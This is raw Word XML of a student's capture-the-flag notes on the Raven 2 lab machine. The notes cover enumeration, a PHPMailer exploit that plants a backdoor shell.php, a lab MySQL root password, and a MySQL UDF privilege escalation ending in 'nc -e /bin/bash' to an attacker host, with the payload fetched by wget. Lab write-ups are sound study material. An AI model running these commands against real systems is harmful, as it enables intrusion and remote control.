          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658DCE09" w14:textId="3E59221B" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Flag3 in the mysql db tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7E3B39" w14:textId="2B2C088B" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6397859A" wp14:editId="46ED5A5C">
            <wp:extent cx="3467100" cy="523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810E" w14:textId="5273D7A4" w:rsidR="008E37B0" w:rsidRDefault="008E37B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41249B73" w14:textId="1E692BAF" w:rsidR="008E37B0" w:rsidRDefault="008E37B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00903E63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>TARGET 2</w:t>
      </w:r>
      <w:r w:rsidR="001052F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001052F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001052F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001052F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001052F9" w:rsidRPr="001052F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(https://www.hackingarticles.in/raven-2-vulnhub-walkthrough</w:t>
      </w:r>
      <w:r w:rsidR="00EE7EF7">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:r w:rsidR="001052F9" w:rsidRPr="001052F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFC38E" w14:textId="762CDD9D" w:rsidR="008E37B0" w:rsidRDefault="008E37B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="004E0F15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>p -sV -sC 192.168.1.115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B451F00" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRPr="00C52D5D" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C52D5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>192.168.1.115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2FB03" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:r w:rsidRPr="00C52D5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Target2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7424602A" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C8C7C8" wp14:editId="31A4FFD3">
            <wp:extent cx="4688560" cy="4839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945" cy="485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2B0D" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:r>
        <w:t>Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A25049" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:r>
        <w:t>22 SSH OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EEF40F" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:r>
        <w:t>80 http Apache httpd 2.4.10 (Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0415C0E4" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:r>
        <w:t xml:space="preserve">111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 139 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 445 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51958B59" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:r>
        <w:t>OS Windows 6.1 (Samba 4.2.14-Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710FA8B9" w14:textId="77777777" w:rsidR="008E37B0" w:rsidRDefault="008E37B0" w:rsidP="008E37B0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MAC: 00:15:5D:00:04:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0023F312" w14:textId="0543565F" w:rsidR="008E37B0" w:rsidRDefault="008E37B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Wpscan –url </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>http://192.168.1.115</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> –wp-content-dir -ep -et -eu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355285F" w14:textId="74FA7E47" w:rsidR="008E37B0" w:rsidRDefault="008E37B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CB6BB9" w14:textId="24E0B2C0" w:rsidR="008E37B0" w:rsidRDefault="008E37B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A5DE576" wp14:editId="2B52DC78">
            <wp:extent cx="5943600" cy="40868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2A58" w14:textId="1C50D1C3" w:rsidR="008E37B0" w:rsidRDefault="008E37B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D530CDB" wp14:editId="1C13D585">
            <wp:extent cx="5943600" cy="21297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051" w14:textId="0A8F4266" w:rsidR="00DA1DC4" w:rsidRDefault="00DA1DC4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DBFF8B" w14:textId="77777777" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF79B23" w14:textId="77777777" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFDEABE" w14:textId="77777777" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F2F6E8" w14:textId="2ED30564" w:rsidR="00DA1DC4" w:rsidRDefault="004E0F15">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="009E79E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA1DC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:r w:rsidR="009E79E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> http://192.168.1.115</w:t>
      </w:r>
      <w:r w:rsidR="00DA1DC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B624E6" w14:textId="7729DA22" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Looked in /vendor/PATH to find flag 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF94A4" w14:textId="77777777" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2262D9" w14:textId="67B7C2F8" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E79E8">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FLAG1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCFF687" w14:textId="07F69747" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77981AC5" wp14:editId="2147DF7F">
            <wp:extent cx="3248025" cy="6000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85FE" w14:textId="77777777" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Per the /vendor/VERSION page </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1621DD" w14:textId="6ED493C8" w:rsidR="009E79E8" w:rsidRDefault="009E79E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>PHPMailer ver 5.2.16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C36639A" w14:textId="7D980633" w:rsidR="00C35468" w:rsidRDefault="00C35468">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C32CB16" w14:textId="43BD8981" w:rsidR="00C35468" w:rsidRDefault="00C35468">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>C: searchsploit phpmailer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5950E4CA" w14:textId="55F81219" w:rsidR="00EE7EF7" w:rsidRDefault="00EE7EF7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F3840F6" wp14:editId="3C20EB85">
            <wp:extent cx="5838825" cy="27813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85DC" w14:textId="5B3B0603" w:rsidR="00EE7EF7" w:rsidRDefault="00EE7EF7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ADDB165" w14:textId="4F991749" w:rsidR="00EE7EF7" w:rsidRDefault="005F4DE8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Config to attack 192.168.1.115/contact.php and will open a shell when I listen to port 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1992E0" w14:textId="77777777" w:rsidR="004E0F15" w:rsidRDefault="004E0F15" w:rsidP="004E0F15">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ nc -lvnp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A871A" w14:textId="05857BA2" w:rsidR="005F4DE8" w:rsidRDefault="004E0F15">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r w:rsidR="005F4DE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>192.168.1.115/shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> to trigger shell(backdoor) and go back to terminal with nc to find connection open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCB129A" w14:textId="1B7A4A9B" w:rsidR="005F4DE8" w:rsidRDefault="005F4D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5A2154" wp14:editId="47BD4F02">
            <wp:extent cx="5181600" cy="838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2282" w14:textId="1B2BBB82" w:rsidR="005F4DE8" w:rsidRDefault="005F4DE8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4DE8">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FLAG2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F279EF" w14:textId="27925A7C" w:rsidR="005F4DE8" w:rsidRDefault="005F4DE8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066100DB" wp14:editId="526A72D3">
            <wp:extent cx="3743325" cy="16668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A09" w14:textId="636FE57A" w:rsidR="005F4DE8" w:rsidRDefault="005F4DE8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C364D7" w14:textId="1FCF6855" w:rsidR="005F4DE8" w:rsidRDefault="005F4DE8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Db password found checking the wordpress wp-config.php file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E2501B" w14:textId="230952FC" w:rsidR="005F4DE8" w:rsidRDefault="005F4DE8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA46600" wp14:editId="00E9C3CD">
            <wp:extent cx="4171950" cy="1066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5A47" w14:textId="45249E05" w:rsidR="005F4DE8" w:rsidRDefault="005F4DE8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CEEE46" w14:textId="6920B144" w:rsidR="005F4DE8" w:rsidRDefault="005F4DE8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68791C00" wp14:editId="09342670">
            <wp:extent cx="3581400" cy="571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6914" w14:textId="1CF4E2E8" w:rsidR="00057518" w:rsidRDefault="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3116D8C3" w14:textId="4A2B2208" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="0005751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15"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00057518">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Flag 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548690AC" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="0005751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15"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$ find . -type f -name ‘flag [3-4].*’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4968FC89" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="0005751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15"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BACFCBE" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="0005751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15"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>Visit</w:t>
      </w:r>
      <w:r w:rsidRPr="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="009F3C08">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>http://192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1668F139" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="0005751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15"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC35492" wp14:editId="2F903417">
            <wp:extent cx="5035603" cy="2535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512" cy="25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D645" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB089A" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518"/>
    <w:p w14:paraId="6885FF98" w14:textId="73C57847" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:r w:rsidRPr="00057518">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Flag 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB4999" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:r>
        <w:t>To enumerate MySQL version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01337B8E" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:r>
        <w:t xml:space="preserve">$ /var/ $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F17AB90" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518"/>
    <w:p w14:paraId="3A1D76E6" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Ver 5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176734C1" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Searchsploit for UDF privilege escalation 1518.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F8E27" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Moved that exploit to my exploits folder…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD574C" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Compiled the code $gcc -shared -fpic -o 1518.so 1518.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176AAC18" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Hosted SimpleHTTPServer on port 8080 to upload to the Mysql tables in /tmp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7258D202" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$ python -m SimpleHTTPServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547D86E5" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ wget 192.168.1.90/1518.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACD5E2" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">In the shell: logged into the Mysql </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77961F02" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$mysql -u root -p </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55307CBF" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>P: R@v3nSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E9051" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>In Mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5563409A" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$ Create table foo(line blob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2313B" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$ Insert into foo values(load_file(‘tmp/1518.so’));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1783BE" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>$ Select * from foo into dumpfile ‘/usr/lib/mysql/plugin/1518.so’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725EBA9" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$ Mysql create function do_system returns integer soname ‘1518.so’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CE91DB" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$ Select do_system(‘nc -ncv 192.168.1.90 4321 -e /bin/bash’);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE41C5" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>On attacking system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EDF9C8" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$ Nc -lvp 4321 to open shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789457FA" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Whoami</w:t>
      </w:r>
